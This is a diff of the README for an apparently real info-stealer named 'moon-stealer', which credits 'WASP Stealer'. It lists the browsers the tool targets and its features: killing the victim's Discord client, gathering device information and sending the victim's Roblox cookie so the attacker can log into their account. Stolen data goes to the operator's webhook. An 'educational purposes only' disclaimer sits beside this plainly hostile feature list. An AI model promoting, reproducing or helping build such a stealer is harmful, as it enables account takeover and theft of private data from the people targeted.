dannythehacker/moon-stealer/README.md

     - Browsers: Opera, Chrome, Brave, Yandex, Edge

 - Extras
-    - Kill victim's discord client
-    - Get information for the user's PC
+    - Gets information of the victim's device
+    - Sends roblox cookie (can be used to login their roblox account)

 ## Important

-Program may crash some times, but it still sends to your webhook.
-Open task manager and exit the program.
 I am not responsible for any damage this software may cause; This program was made for educational purposes only.

 Credits: WASP Stealer